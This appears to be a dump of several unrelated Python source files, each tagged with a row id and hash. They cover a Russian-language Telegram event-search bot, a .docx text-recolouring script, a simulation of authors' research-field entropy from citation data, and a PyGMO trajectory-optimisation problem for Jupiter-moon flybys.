@bot.message_handler(commands=['Платное', 'Бесплатное', 'Не', 'Показать'])
def handle_start(message):
try:
bot.send_message(message.chat.id, 'Подождите...Ищем события...')
try:
dermo = choice_main(text)
except requests.exceptions.ReadTimeout:
bot.send_message(message.chat.id,
'Превышено время ожидания ответа от KudaGo.com...Попробуйте заново через несколько минут')
for i in range(len(dermo)):
mes = "#" + str(i + 1) + "\n" + dermo[i]["title"] + "\n" + " " + dermo[i][
"content"] + "\n" + "Смотреть больше:" + dermo[i]["url"]
bot.send_message(message.chat.id, mes)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
keyboard.add(types.KeyboardButton('/Начать сначала'))
bot.send_message(message.chat.id, sm + 'Мы всегда рады помочь Вам!', reply_markup=keyboard)
users_count()
except NameError:
bot.send_message(message.chat.id, "Извините!Произошла неизвестная ошибка..." + sm1)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
keyboard.add(types.KeyboardButton('/Начать сначала'))
bot.send_message(message.chat.id, 'Попробуйте найти события еще раз', reply_markup=keyboard)
users_count()
if __name__ == '__main__':
bot.polling(none_stop=True)
|
984,666 | c7f211e67a8d26e5946fdcc0d7b6ea3f02e58705 | params = {
'vocab_size': 15000,
'embed_dim': 100,
'dropout': 0.5,
'pad_len': 200,
'pad_type': 'post',
'batch_size': 64
}
|
984,667 | 17c7dffe18074974ea764e0387d397e7ed63a831 | #!/usr/bin/env python3
# -*-encoding: utf-8-*-
# author: Valentyn Kofanov
import docx
from docx.shared import RGBColor
def main(filename_input, filename_output, c1=RGBColor(255, 0, 0), c2=RGBColor(45, 50, 0)):
doc1 = docx.Document(filename_input)
doc2 = docx.Document()
for paragraph in list(doc1.paragraphs):
p = doc2.add_paragraph()
for i in range(len(paragraph.runs)):
run = paragraph.runs[i]
if run.font.color.rgb == c1:
run.font.color.rgb = c2
# print(1)
r = p.add_run()
r.text = run.text
r.font.color.rgb = run.font.color.rgb
doc2.save(filename_output)
if __name__ == '__main__':
main('res.docx', 'test.docx', c1=RGBColor(125, 125, 125), c2=RGBColor(255, 0, 0))
|
984,668 | 788ebd9ce180618da5e9415d8613d16a5ff45437 | import matplotlib.pyplot as plt
import numpy as ny
import math
import os
from math import sqrt
import time
import operator
import random
import sys
from collections import deque
def pearsoncor(X, Y, code = 0):
"""
Computes pearson's correlation coefficient.
code
0 - using deviations from means.
1 - common formula.
"""
n = len(X)
sx = ssd(X)
sy = ssd(Y)
xbar = float(sum(X)) / n
ybar = float(sum(Y)) / n
if code == 0:
return sum([(x - xbar) * (y - ybar) for x, y in zip (X,Y)])/(sx * sy*(n-1.0))
else:
numer = sum([x*y for x,y in zip(X,Y)]) - n*(xbar * ybar)
denom = sqrt((sum([x*x for x in X]) - n* xbar**2)*(sum([y*y for y in Y]) -n* ybar**2))
return (numer /denom)
def svar(X):
n = len(X)
if n <= 1:
raise ValueError, "sd(): n must be greater than 1"
xbar = float(sum(X)) /n
return (sum([(x-xbar)**2 for x in X])/(n-1))
def ssd(X):
return sqrt(svar(X))
def fieldhieararchy():
readfile = open('data/field_hierarchy.txt','r')
d = {}
for line in readfile:
line = line.strip()
l = line.split()
d[l[0]] = l[1]
readfile.close()
return d
def getcitesdict():
files = os.listdir('data/domains_with_cites')
d = {}
k = 0
for file in files:
readfile = open('data/domains_with_cites/'+file,'r')
for line in readfile:
l = line.split()
cites = l[-1]
l = l[:-1]
if len(l) < 2:
k = k + 1
else:
if l[-1][0] == '(': l = l[:-1]
line = ' '.join(l)
line = line.strip()
line = line.lower()
d[line] = cites
readfile.close()
return d
def authres(level=1):
readfile = open('data/dataset_alltagged1','r')
thispaper = []
dyear = {}
mscites = {}
bestcoauth = {}
dauthresl ={}
mscites = {}
din = {}
imp = {}
dcite = getcitesdict()
dfield = fieldhieararchy()
fielddict = {} #fielddict[1234] = 'algo'
dauths = {} #dauths[1234] = ['jack','richard'...]
authglob = {}
firstauth = {}
for line in readfile:
line = line.strip()
if line == '':
auths,fields,cites = [],[],[]
for a in thispaper:
if a[1] == 't':
year = int(a[2:])
elif a[1] == 'i':
index = a[6:]
elif a[1] == '%':
cites.append(a[2:])
elif a[1] == '@':
auths = a[2:].split(',')
elif a[1] == 'f':
if level == 2:
fields.append(dfield[a[2:]])
else: fields.append(a[2:])
elif a[1] == '*':
title = a[2:]
if title[-1] == '.':
title = title[:-1]
title = title.lower()
if len(fields) == 1:
fielddict[index] = fields[0]
dauths[index] = auths
dyear[index] = year
for auth in auths:
if auth != '':
auth = auth.replace(' ','_')
if auth in authglob:
authglob[auth].append(index)
else: authglob[auth] = [index]
if title in dcite:
mscites[index] = int(dcite[title])
else:
mscites[index] = 'not_in_ms'
for cite in cites:
if cite not in din:
din[cite] = [index]
else: din[cite].append(index)
for auth in auths:
if auth != '':
auth = auth.replace(' ','_')
if auth not in dauthresl:
dauthresl[auth] = []
for f in fields:
dauthresl[auth].append((f,index,year,1))
thispaper = []
continue
thispaper.append(line)
for i in dyear:
sum = 0
if i in din:
for y in din[i]:
sum += 1
imp[i] = sum
readfile.close()
return (dyear,fielddict,dauths,imp,mscites,authglob,dauthresl)
def binspapers(n,level=1):
(dyear,fielddict,dauths,imp,mscites,authglob,dauthresl) = authres(level)
bins = []
for i in range(n):
bins.append([])
temp = []
for i in dyear:
temp.append((i,dyear[i]))
temp = sorted(temp,key=byyear)
k = len(temp)/n
k1 = len(temp) % n
for i in range(k+k1):
bins[0].append(temp[i][0])
j = k+k1
for i in range(1,n):
for m in range(k):
bins[i].append(temp[j][0])
j += 1
return (dyear,fielddict,dauths,imp,mscites,authglob,bins,dauthresl)
def byyear(t):
return int(t[1])
def getfields(level=1):
d = fieldhieararchy()
if level == 2:
return list(set(d.values()))
return d.keys()
def normalizepref(ovals):
sum = 0
for i in ovals:
sum = sum + i
for i in range(len(ovals)):
ovals[i] = float(ovals[i])/sum
cumovals = ny.cumsum(ovals)
return cumovals
def prefattach(circle):
r = random.random()
for i in range(len(circle)):
if i == 0 and r < circle[0]:
return i
elif i > 0 and circle[i-1] <= r and r < circle[i]:
if i+1 <= len(circle)-1 and circle[i] == circle[i+1]:
return random.choice([i,i+1])
else: return i
def getpreffield(d):
x,y = [],[]
for i in d:
x.append(i)
y.append(d[i])
y = normalizepref(y)
i = prefattach(y)
return x[i]
def updateauthdict(mauth,f,auths):
for auth in auths:
if auth in mauth:
d = mauth[auth]
if f in d:
d[f] += 1
else: d[f] = 1
mauth[auth] = d
else:
d = {}
d[f] = 1
mauth[auth] = d
return mauth
def updatetotcitedict(mauthc,ncites,f,auths):
for auth in auths:
if auth in mauthc:
mauthc[auth] += ncites
else:
mauthc[auth] = ncites
return mauthc
def basic4(n,k0,rand,level=1): #weightage to authors who got more total cites
(dyear,fielddict,dauths,imp,mscites,authglob,bins,dauthresl) = binspapers(n,level)
writefile = open('data/authresearch_1','w')
allf = getfields(level)
mfield = {}
mauth = {}
mauthc = {}
count,count1 = 0,0
mc,mc1 = 0,0
for i in range(k0):
for paper in bins[i]:
f = fielddict[paper]
mfield[paper] = f
if mscites[paper] == 'not_in_ms': ncites = imp[paper]
else: ncites = max(mscites[paper],imp[paper])
mauth = updateauthdict(mauth,f,dauths[paper])
mauthc = updatetotcitedict(mauthc,ncites,f,dauths[paper])
count1 += 1
random.seed()
for i in range(k0,n):
for paper in bins[i]:
r = random.random()
if r >= rand:
d,d2 = {},{}
den,c1 = 0,-1
maxauth = ''
for auth in dauths[paper]:
if auth in mauthc:
if mauthc[auth] > c1:
maxauth = auth
c1 = mauthc[auth]
den += mauthc[auth]
if den > 0:
for auth in dauths[paper]:
if auth in mauth:
d1 = mauth[auth]
num = mauthc[auth]
for j in d1:
if j in d:
d[j] += d1[j]*(float(num)/den)
d2[j] += d1[j]
else:
d[j] = d1[j]*(float(num)/den)
d2[j] = d1[j]
if len(d) > 0:
f = getpreffield(d)
realf = fielddict[paper]
dex = mauth[maxauth]
maxf = max(dex.iteritems(), key=operator.itemgetter(1))[0]
if maxf == realf: mc += 1
else: mc1 += 1
count += 1
if r < rand or len(d) == 0:
r1 = random.randint(0,len(allf)-1)
f = allf[r1]
mfield[paper] = f
mauth = updateauthdict(mauth,f,dauths[paper])
if mscites[paper] == 'not_in_ms': ncites = imp[paper]
else: ncites = mscites[paper]
mauthc = updatetotcitedict(mauthc,ncites,f,dauths[paper])
#print str(mc),str(mc1),str(float(mc)/(mc+mc1))
for auth in authglob:
writefile.write(auth+' ')
for index in authglob[auth]:
writefile.write(mfield[index]+'@'+str(dyear[index])+'@'+str(imp[index])+'@'+str(mscites[index])+' ')
writefile.write('\n')
writefile.close()
return (mscites,dauthresl,imp,mfield,fielddict)
def degreedist(l,x,flag):
b = 10
y = []
buck = float(max(l)-min(l))/b
i = min(l)
if flag: x.append(i+buck)
y.append(0)
for j in range(1,b):
if flag: x.append(x[j-1]+buck)
y.append(0)
for j in l:
for k in range(b):
if k == 0 and j < x[k]:
y[k] += 1
break
if x[k-1] <= j < x[k] :
y[k] += 1
break
if k == b-1 and j == x[k]:
y[k] += 1
x1 = [float(x[0])/2]
for i in range(1,b):
x1.append(float(x[i]+x[i-1])/2)
s = sum(y)
for i in range(len(y)):
y[i] = float(y[i])/s
return (x,x1,y)
def plotlines1(l,l1,flag,wl):
x,x1,y = degreedist(l,[],True)
x2,xp1,yp1 = degreedist(l1,[],True)
return (xp1,yp1,pearsoncor(y,yp1))
def bothdiv2(n,k0,rand,wl,mw,enttype,level=1):
w = 2 #for pearsoncorr
(mscites,dauthresl,imp,mfield,fielddict) = basic4(n,k0,rand,level) #for basic2 and basic5 5 args
if enttype == 'windowentropy':
dres1 = windowentropy(wl,1,level)
dres2 = windowentropy(wl,0,level)
else:
dres1 = plaindiv(w,1,level)
dres2 = plaindiv(w,0,level)
(xp1,yp1,corv1) = plotlines1(dres1.values(),dres2.values(),1,wl)
#print str(xp1)
#print str(yp1)
return (xp1,yp1,corv1)
def bothdiv(enttype):
nl = [100]
randl = [0]
wl = [5]
mw = [5]
level = 1
its = 1
le = -1
x,y = [],[]
cov = 0
for j in range(its):
print str(j)
xp1,yp1,corv1 = bothdiv2(100,10,0,5,5,enttype,1)
print str(xp1)
if len(x) == 0:
for i in range(len(xp1)):
x.append(xp1[i])
y.append(yp1[i])
cov = corv1
le = len(x)
else:
for i in range(le):
x[i] = float((j*x[i])+xp1[i])/(j+1)
y[i] = float((j*y[i])+yp1[i])/(j+1)
cov = float((j*cov)+corv1)/(j+1)
plotlines2(x,y,enttype)
print 'Covariance: ' + str(cov)
return
def plot2text(fname,x,y):
writefile = open('output_'+fname,'a')
for i in range(len(x)):
writefile.write(str(x[i])+' ')
writefile.write('\n')
for i in range(len(y)):
writefile.write(str(y[i])+' ')
writefile.write('\n\n')
writefile.close()
return
def plotlines2(xm,ym,enttype):
if enttype == 'windowentropy':
dres1 = windowentropy(5,1,1) #for window entropy
else:
dres1 = plaindiv(2,1,1) #for plain entropy
x,x1,y = degreedist(dres1.values(),[],True)
plt.figure()
plt.plot(x1,y,'g-',xm,ym,'r-')
plot2text(enttype+'.txt',x1,y)
plot2text(enttype+'.txt',xm,ym)
plt.legend(['real-data','model-data'])
plt.ylabel('Fraction of Authors')
plt.xlabel(enttype)
plt.show()
return
def caldiversity(d,flag = 0):
sum = 0
for i in d.values():
if flag == 0: sum += len(i)
else:
if i > 0: sum += i
res = 0
for i in d.values():
if flag == 0:f = float(len(i))/sum
elif i > 0:
f = float(i)/sum
res += f*math.log(f)
if res != 0: res = -1*res
return res
def getresdict(flag,level=1):
if flag == 1:
if level == 1: readfile = open('data/authresearch_data','r')
else:
readfile = open('data/authresearch_1','r')
d = {}
for line in readfile:
line = line.strip()
line = line.split()
if line[0] != '':
d[line[0]] = []
for s in line[1:]:
ls = s.split('@')
d[line[0]].append(tuple(ls))
ls = d[line[0]]
ls = sorted(ls,key=byyear)
d[line[0]] = ls
readfile.close()
return d
def plaindiv(w,flag,level=1):
d = getresdict(flag,level)
res,y = [],[]
gres = {}
for auth in d:
dres = {}
prev = 'x'
sum,k = 0,0
if len(d[auth]) < w: continue
for a,b,c,x in d[auth]:
if a in dres: dres[a] += 1
else: dres[a] = 1
res.append(caldiversity(dres,1))
gres[auth] = caldiversity(dres,1)
return gres
def windowentropy(w,flag,level=1):
d = getresdict(flag,level)
resl = []
dres = {}
for auth in d:
res,k = 0,0
if len(d[auth]) < w: continue
temp = {}
for a,b,c,x in d[auth][:w]:
if a in temp: temp[a] += 1
else: temp[a] = 1
res = caldiversity(temp,1)
k += 1
l,r = 0,w-1
while r < len(d[auth]):
lv,rv = d[auth][l][0],d[auth][r][0]
temp[lv] -= 1
if rv in temp:
temp[rv] += 1
else: temp[rv] = 1
res += caldiversity(temp,1)
k += 1
l += 1
r += 1
res = float(res)/k
resl.append(res)
dres[auth] = res
#drawhist(resl)
return dres
def main(enttype):
if (enttype == 'windowentropy') or (enttype == 'plainentropy'):
bothdiv(enttype)
return
print 'Invalid argument. Valid arg are windowentropy or plainentropy'
if __name__ == '__main__':
if len(sys.argv) > 1:
main(sys.argv[1])
else: print 'Enter an argument. Valid arg are windowentropy or plainentropy' |
984,669 | 9a79ffeba0077b0ff8e01def70ba94ac06e147e0 | from PyGMO.problem import base as base_problem
from PyKEP import epoch,DAY2SEC,planet_ss,MU_SUN,lambert_problem,propagate_lagrangian,fb_prop, AU, closest_distance
from math import pi, cos, sin, acos
import math
from scipy.linalg import norm
from gtoc6 import europa, io, JR, MU_JUPITER
import numpy as np
from numpy import linalg
class mga_incipit(base_problem):
"""
A PyGMO global optimization problem (box-bounded, continuous) representing the gtoc6 preliminary trajectory capture (single and multi-objective)
Decision vector:
[t0,u,v,T,a0] + [beta1, rp1/rP1, eta1,a1] + ....
Each leg time-of-flight can be obtained as T(n) = a(n)/(sum(a(i)))*T, T(n-1)= a(n-1)/(sum(a(i)))*T
---Aurelie 27-09-12
"""
def __init__(self,
seq = [io,io,europa],
t0 = [epoch(7305.0),epoch(11322.0)],
tof = [200,500],
multi_objective = False
):
"""
* seq: list of jupiter moons defining the trajectory incipit
* t0: list of two epochs defining the launch window
* tof: list of n lists containing the lower and upper bounds for the legs flight times (days)
"""
self.__n_legs = len(seq)
self.tof = tof
#dim = 5+4 * self.__n_legs-1
dim = 5+4*(len(seq)-1)
obj_dim = multi_objective + 1
#First we call the constructor for the base PyGMO problem
#As our problem is n dimensional, box-bounded (may be multi-objective), we write
#(dim, integer dim, number of obj, number of con, number of inequality con, tolerance on con violation)
super(mga_incipit,self).__init__(dim,0,obj_dim,0,0,0)
#We then define all planets in the sequence and the common central body gravity as data members
self.seq = seq
self.common_mu = seq[0].mu_central_body
#And we compute the bounds
lb = [t0[0].mjd2000,0.0,0.0,tof[0],1e-5]
ub = [t0[1].mjd2000,1.0,1.0,tof[1],1-1e-5]
for i in range(1, self.__n_legs):
lb = lb + [-2*pi ,1.1 , 1e-5 , 1e-5]
ub = ub + [2*pi ,30.0, 1-1e-5, 1-1e-5]
#Accounting for the fly-bys altitudes
for i,pl in enumerate(seq[0:-1]):
lb[6+4*i] = pl.safe_radius / pl.radius
ub[6+4*i] = (pl.radius + 2000000) / pl.radius
#And we set them
self.set_bounds(lb,ub)
#Objective function
def _objfun_impl(self,x):
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
#sum_alpha = 0
#for i in range(self.__n_legs-1):
# sum_alpha = sum_alpha+x[4+4*i]
#for i in xrange(self.__n_legs-1):
# T[i] = (x[4+4*i]/sum_alpha)*x[3]
for i in xrange(0,self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#print "\tDuration: " + str(T) + "days"
#return(T,)
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
coeff = 0.3
for i in xrange(0,self.__n_legs):
ratio[i] = (DV[i]/(T[i]*DAY2SEC))
DV_2rj[i] = DV[i] + max((2.0-close_d[i]),0.0)*1000 + max((ratio[i]-coeff*(0.1/2000)),0.0)*100
T_2rj[i] = T[i] + max((2.0-close_d[i]),0.0)*1000 + max((ratio[i]-coeff*(0.1/2000)),0.0)*100
#if self.f_dimension == 1:
# return (sum(DV)
#else:
# return (sum(DV), sum(T))
if self.f_dimension == 1:
return (sum(DV_2rj))
else:
return (sum(DV_2rj), sum(T_2rj))
def pretty(self,x):
"""
Prints human readable information on the trajectory represented by the decision vector x
Example::
prob.pretty(x)
"""
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
print "\nFirst Leg: 1000JR to " + self.seq[0].name
print "\tDeparture: " + str(t_P[0]) + " (" + str(t_P[0].mjd2000) + " mjd2000) "
print "\tDuration: " + str(T[0]) + "days"
print "\tInitial Velocity Increment (m/s): " + str(DV[0])
print "\tArrival relative velocity at " + self.seq[0].name +" (m/s): " + str(norm([a-b for a,b in zip(v_end_l,v_P[0])]))
print "\tClosest approach distance: " + str(close_d[0])
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
print "\nleg no. " + str(i+1) + ": " + self.seq[i-1].name + " to " + self.seq[i].name
print "\tDuration (days): " + str(T[i])
print "\tFly-by epoch: " + str(t_P[i]) + " (" + str(t_P[i].mjd2000) + " mjd2000) "
print "\tFly-by altitude (km): " + str((x[6+(i-1)*4]*self.seq[i-1].radius-self.seq[i-1].radius)/1000)
print "\tDSM after (days): " + str(x[7+(i-1)*4]*T[i])
print "\tDSM magnitude (m/s): " + str(DV[i])
print "\tClosest approach distance: " + str(close_d[i])
print "\tApoapsis at closest distance: " + str(ra)
print "\tV in (m/s): " + str(v_end_l)
print "\tV out (m/s): " + str(v_out)
print "\nArrival at " + self.seq[-1].name
vel_inf = [a-b for a,b in zip(v_end_l,v_P[-1])]
print "Arrival epoch: " + str(t_P[-1]) + " (" + str(t_P[-1].mjd2000) + " mjd2000) "
print "Arrival Vinf (m/s): " + vel_inf.__repr__() + " - " + str(norm(vel_inf))
print "Total mission time (days): " + str(sum(T))
print "Total DV (m/s): " + str(sum(DV))
#Plot of the trajectory
def plot(self,x):
"""
Plots the trajectory represented by the decision vector x
Example::
prob.plot(x)
"""
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from PyKEP.orbit_plots import plot_planet, plot_lambert, plot_kepler
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(0,0,0, color='y')
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
plot_planet(ax, planet, t0=t_P[i], color=(0.8,0.6,0.8), legend=True, units = JR)
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
plot_lambert(ax,l, sol = 0, color='k', legend=False, units = JR, N=500)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[4*i+3]*T[i]*DAY2SEC,self.common_mu)
plot_kepler(ax,r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu,N = 500, color='b', legend=False, units = JR)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
plot_lambert(ax,l, sol = 0, color='r', legend=False, units = JR, N=500)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
plt.show()
def stats_leg(self,x):
import matplotlib as mpl
import matplotlib.pyplot as plt
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
symbol_dict = {
'io' : 'yo',
'europa' : 'bo',
'ganymede' : 'ro',
'callisto' : 'ko' }
for i in xrange(0,self.__n_legs):
if close_d[i] > 2:
#plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
plt.plot(DV[i], T[i], symbol_dict[self.seq[i].name])
plt.plot(DV,T)
else:
print "\n the closest distance is less than 2*Rj "
plt.show()
def stats(self,x):
import matplotlib as mpl
import matplotlib.pyplot as plt
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
#print "Total mission time (days): " + str(sum(T))
#print "Total DV (m/s): " + str(sum(DV))
symbol_dict = {
'io' : 'yo',
'europa' : 'bo',
'ganymede' : 'ro',
'callisto' : 'ko' }
#for i in xrange(0,self.__n_legs):
